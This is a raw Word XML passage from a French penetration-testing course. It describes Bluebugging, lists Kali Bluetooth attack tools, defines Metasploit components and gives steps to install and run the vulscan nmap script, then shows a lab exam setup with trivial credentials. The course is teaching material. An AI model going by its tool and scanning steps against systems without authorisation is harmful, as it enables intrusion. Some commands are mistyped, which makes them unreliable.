      </w:pPr>
      <w:r>
        <w:t>Éteindre le Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB94F1" w14:textId="77777777" w:rsidR="00EB280C" w:rsidRPr="002C115C" w:rsidRDefault="00EB280C" w:rsidP="00EB280C"/>
    <w:p w14:paraId="565ACC18" w14:textId="77777777" w:rsidR="002C115C" w:rsidRDefault="002C115C" w:rsidP="006C2550"/>
    <w:p w14:paraId="50D73FCF" w14:textId="77777777" w:rsidR="00297E5A" w:rsidRDefault="00297E5A" w:rsidP="006C2550"/>
    <w:p w14:paraId="31AD9CDC" w14:textId="77777777" w:rsidR="00297E5A" w:rsidRDefault="00297E5A" w:rsidP="006C2550"/>
    <w:p w14:paraId="5F838BE0" w14:textId="77777777" w:rsidR="00297E5A" w:rsidRDefault="00297E5A" w:rsidP="006C2550"/>
    <w:p w14:paraId="1CED69F8" w14:textId="2948DF81" w:rsidR="00342D35" w:rsidRDefault="00297E5A" w:rsidP="00297E5A">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Blue Bugging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2BE97" w14:textId="77777777" w:rsidR="00297E5A" w:rsidRDefault="00297E5A" w:rsidP="00297E5A"/>
    <w:p w14:paraId="53DA1FD2" w14:textId="7CEDC73E" w:rsidR="00297E5A" w:rsidRDefault="00297E5A" w:rsidP="00297E5A">
      <w:r>
        <w:t>Lorsque que votre téléphone est en mode découverte, un pirate peut utiliser le même point d’entré que le Bluejacking et le Bluesnarfing pour prendre votre téléphone sous son control.</w:t>
      </w:r>
      <w:r w:rsidR="002D2B24">
        <w:t xml:space="preserve"> La plupart des téléphones ne sont pas vulnérables au Blue</w:t>
      </w:r>
      <w:r w:rsidR="00AA17C6">
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidR="002D2B24">
        <w:t xml:space="preserve">ugging, mais certains des premiers modèles dont le firewire est obsolète peuvent être piratées de cette façon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABA8CD" w14:textId="77777777" w:rsidR="00AA17C6" w:rsidRDefault="00AA17C6" w:rsidP="00297E5A"/>
    <w:p w14:paraId="39A7CA19" w14:textId="77777777" w:rsidR="008B43C5" w:rsidRDefault="008B43C5" w:rsidP="008B43C5">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les différents outils intégrés dans Kali pour pirater le Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A2BC2" w14:textId="77777777" w:rsidR="008B43C5" w:rsidRDefault="008B43C5" w:rsidP="008B43C5"/>
    <w:p w14:paraId="38C2D556" w14:textId="77777777" w:rsidR="008B43C5" w:rsidRDefault="008B43C5" w:rsidP="008B43C5">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bluelog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un outil d’étude. Il scanne la zone pour trouver </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>la</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pérophériques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> découvrables et les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enregirstrer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans un fichier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C390CD" w14:textId="7CC0B93B" w:rsidR="008B43C5" w:rsidRDefault="008B43C5" w:rsidP="008B43C5">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blueranger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Un script Python simple qui utilise les pings i2cap pour localiser les périphériques Bluetooth et déterminer leurs distances approximatives. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0858B3" w14:textId="7290888D" w:rsidR="008B43C5" w:rsidRDefault="008B43C5" w:rsidP="008B43C5">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Btscanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cet outil basé sur une interface utilisateur </w:t>
      </w:r>
      <w:r w:rsidR="00AC29FF">
        <w:t>graphiques recherche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pérophériques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0EB827" w14:textId="73FA5552" w:rsidR="008B43C5" w:rsidRDefault="008B43C5" w:rsidP="008B43C5">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> logiciel de spoofing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D530C" w14:textId="77777777" w:rsidR="0081458C" w:rsidRDefault="008B43C5" w:rsidP="008B43C5">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t>Bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t xml:space="preserve"> est le successeur d'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t xml:space="preserve"> et comporte des modules d'attaque pour différents types de technologies radio et réseau, dont le Bluetooth. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t>Bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t xml:space="preserve"> peut traquer et attaquer des réseaux Wi-Fi, et par défaut, commence à énumérer les périphériques sur n'importe quel réseau sur lequel vous vous trouvez. Cette capacité est bien </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t>utilie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B43C5">
        <w:t xml:space="preserve"> pour identifier et balayer des appareils Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7A3AB2" w14:textId="77777777" w:rsidR="0081458C" w:rsidRDefault="0081458C" w:rsidP="0081458C"/>
    <w:p w14:paraId="50370FD9" w14:textId="77777777" w:rsidR="0081458C" w:rsidRDefault="0081458C" w:rsidP="0081458C"/>
    <w:p w14:paraId="4315B3A9" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="0081458C"/>
    <w:p w14:paraId="5EB64BC8" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="0081458C"/>
    <w:p w14:paraId="1286188B" w14:textId="486C2CF3" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module X : META </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A5E55" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="0081458C"/>
    <w:p w14:paraId="5B4CB490" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:pPr>
        <w:pStyle w:val="Sous-titre"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les composant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F741170" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="6D47D4D0" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =&gt; interface de commande principale </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF983B3" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="19F17D08" w14:textId="469CFA7B" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:r>
        <w:t>Module =&gt; Modules de support tel que les exploits, les scanners, les charges utiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467FF40" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="283781E1" w14:textId="0F42216B" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:r>
        <w:t xml:space="preserve">Outils =&gt; Outils automnes qui faciliterons la recherche de vulnérabilité, l’évaluation des vulnérabilités ou les tests d’intrusion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A785A9" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="1BE288F2" w14:textId="4E6D44DC" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:r>
        <w:t xml:space="preserve">Vulnérabilité =&gt; techniques applicables ou outils pour se connecter à une faiblesse du système </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A50690" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="4586F142" w14:textId="24790415" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7">
      <w:r>
        <w:t xml:space="preserve">Exploit =&gt; un exploit est une attaque qui tire parti des vulnérabilités des applications, du système d’application, des réseaux ou du matériel. Les exploits, se présentent généralement </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sous la forme d’un logiciel ou d’un code dont le but est de prendre le contrôle d’un ordinateur ou de voler les données </w:t>
      </w:r>
      <w:r w:rsidR="006B4620">
        <w:t>du réseau</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145D360" w14:textId="77777777" w:rsidR="006B4620" w:rsidRDefault="006B4620" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="3AEA59FF" w14:textId="77777777" w:rsidR="006B4620" w:rsidRDefault="006B4620" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="3A7970C2" w14:textId="40863070" w:rsidR="006B4620" w:rsidRDefault="006B4620" w:rsidP="00AE5DD7">
      <w:r>
        <w:t xml:space="preserve">Charge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> =&gt; Les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ou charge </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, sont les éléments de cyberattaque </w:t>
      </w:r>
      <w:r w:rsidR="00F93599">
        <w:t xml:space="preserve">qui provoquent des dégâts. Les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F93599">
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F93599">
        <w:t xml:space="preserve"> malveillants </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DCB7D2" w14:textId="77777777" w:rsidR="00F93599" w:rsidRDefault="00F93599" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="2C929C12" w14:textId="7CBBE8A0" w:rsidR="00F93599" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ajouter des scripts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E62B56" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2"/>
    <w:p w14:paraId="068F7010" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">Installation et utilisation des script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>vulscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> pour </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6544D076" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2"/>
    <w:p w14:paraId="55FCCD74" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">Allez dans le répertoire scripts de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003967A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commande</w:t>
      </w:r>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> : cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">/scripts/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B75567B" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">Installation des scripts </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>Vulscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003967A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commande</w:t>
      </w:r>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> : git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tgtFrame="_blank" w:tooltip="https://github.com/scipag/vulscan.git" w:history="1">
        <w:r w:rsidRPr="003967A2">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/scipag/vulscan.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0716D3" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>Commande:In</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> -s'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>scipag_vulscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>/scripts/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>vulscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E108400" w14:textId="77777777" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">Commande : cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>vulscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">/utilities/updater/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB71124" w14:textId="77777777" w:rsidR="00D14767" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve">Commande : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003967A2">
        <w:t>chmod+x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003967A2">
        <w:t xml:space="preserve"> updateFiles.sh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B81AABF" w14:textId="59194CBF" w:rsidR="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003967A2">
        <w:t>Commande :</w:t>
      </w:r>
      <w:r w:rsidR="00D14767">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003967A2">
        <w:t>./updateFiles.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAD2EB" w14:textId="7D5AED8C" w:rsidR="003967A2" w:rsidRPr="003967A2" w:rsidRDefault="003967A2" w:rsidP="003967A2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commande : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulcan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07287F0F" w14:textId="77777777" w:rsidR="00AE5DD7" w:rsidRDefault="00AE5DD7" w:rsidP="00AE5DD7"/>
    <w:p w14:paraId="5B9A6E25" w14:textId="77BC201A" w:rsidR="00297E5A" w:rsidRPr="00297E5A" w:rsidRDefault="00297E5A" w:rsidP="00AE5DD7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B866326" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_ootve3eu83jq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="134"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXAMEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9688F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="23103AC1" w14:textId="28BBA7A3" w:rsidR="00223B72" w:rsidRDefault="00342D35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un routeur et 4 machines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAB03E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Réseau : cyber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3801DA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSID : cyber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC0566" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MDP : cyber </w:t>
      </w:r>
    </w:p>
